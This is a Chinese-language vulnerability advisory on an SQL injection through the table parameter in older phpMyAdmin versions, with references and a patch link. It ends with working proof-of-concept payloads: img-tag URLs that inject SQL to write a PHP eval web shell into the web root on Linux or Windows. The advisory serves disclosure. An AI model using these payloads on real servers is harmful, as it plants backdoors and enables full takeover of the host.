phpMyAdmin table参数SQL注入漏洞

  • 2022-07-10 12:50:53
影响版本:
phpmyadmin phpmyadmin 3.x
phpmyadmin phpmyadmin 2.11.x
漏洞描述:
bugtraq id: 32720

phpmyadmin是用php编写的工具,用于通过web管理mysql。

phpmyadmin的./phpmyadmin/libraries/db_table_exists.lib.php文件中没有正确地过滤table参数:

$_result = pma_dbi_try_query(
'select count(*) from `' .
pma_sqladdslashes($table, true) . '`;',
null, pma_dbi_query_store);

pma_sqladdslashes()函数仅禁用了单引号,但忽略了反勾号(`)和双引号("),因此远程攻击者可以通过提交恶意请求执行sql注入攻击。
<*参考
http://secunia.com/advisories/33076/
http://www.phpmyadmin.net/home_page/security/pmasa-2008-10.php
http://www.milw0rm.com/exploits/7382
*>
sebug安全建议:
phpmyadmin
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12100


*nix平台: <html> <img src="http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=tables%60+where+0+union+select+char%2860%2c+63%2c+112%2c+104%2c+112%2c+32%2c+101%2c+118%2c+97%2c+108%2c+40%2c+36%2c+95%2c+71%2c+69%2c+84%2c+91%2c+101%2c+93%2c+41%2c+63%2c+62%29+into+outfile+%22%2fvar%2fwww%2fbackdoor.php%22+--+1"> </html> path: /var/www/backdoor.php backdoor: <?php eval($_get[e]);?> windows平台: <html> <img src="http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=tables%60+where+0+union+select+char%2860%2c+63%2c+112%2c+104%2c+112%2c+32%2c+101%2c+118%2c+97%2c+108%2c+40%2c+115%2c+116%2c+114%2c+105%2c+112%2c+115%2c+108%2c+97%2c+115%2c+104%2c+101%2c+115%2c+40%2c+36%2c+95%2c+71%2c+69%2c+84%2c+91%2c+101%2c+93%2c+41%2c+41%2c+59%2c+63%2c+62%29+into+outfile+%22c%3a%2fxampp%2fhtdocs%2fbackdoor.php%22+--+1"> </html> path: c:/xampp/htdocs/backdoor.php backdoor: <?php eval(stripslashes($_get[e]));?>

猜你喜欢